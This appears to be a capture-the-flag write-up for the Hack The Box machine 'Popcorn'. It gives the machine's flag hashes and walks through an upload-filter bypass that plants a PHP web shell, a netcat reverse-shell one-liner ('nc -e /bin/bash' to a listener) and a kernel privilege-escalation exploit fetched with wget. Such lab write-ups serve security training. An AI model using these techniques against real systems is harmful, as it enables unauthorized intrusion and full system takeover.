Comment on page

Popcorn

Popcorn - 10.10.10.6 
Target Enumeration: 
OS: Linux 
IP: 10.10.10.6 
User: 5e36a919398ecc5d5c110f2d865cf136 
Root: f122331023a9393319a0370129fd9b14 
Ports / Services / Software Versions Running 
22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0) 
80/tcp open http Apache httpd 2.2.12 ((Ubuntu)) 
Vulnerability Exploited: 
Photo upload allows remote code execution by injecting a malicious php file and modifying the request with burp. 
Privilege escalation 
Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Local Privilege Escalation
​https://www.exploit-db.com/exploits/14339/ 
Exploiting the host: 
Nmap
Dirb found /torrent
Appears to be a torrent hosting application
Application allows users to sign up and upload torrents.
Find a clean torrent file (I used debian)
Upload it to the app.
Edit the torrent once it is uploaded. 
The vulnerable point is the photo section so find a simple backdoor php shell.
Rename it to shell.jpg.php and upload the shell to the app. Catch the request in burp.
Change content type to: Content-Type: image/jpg 
This successfully uploaded.
Inspect the image from the webapp to find the true path.
Visit the true path and issue ?cmd=id after the .php extension.
Looking in /bin we see nc is installed.
Set a listener in 443 and execute nc -e /bin/bash 10.10.14.11 443 via the browser. 
Now you have a shell.
Move to /dev/shm and download enumeration scripts
Google the kernel for privesc opportunities. 
Run further tools while researching kernel exploits.
Easiest way may be full nelson based on the uname -a output. 
Download from exploitdb 
wget https://www.exploit-db.com/download/15704.c 
Now on popcorn download and compile the exploit then run it to get root.
​

Hack The Box last updated - 2019 - Previous

Optimum

Next - Hack The Box last updated - 2019

Beep

Last modified 4yr ago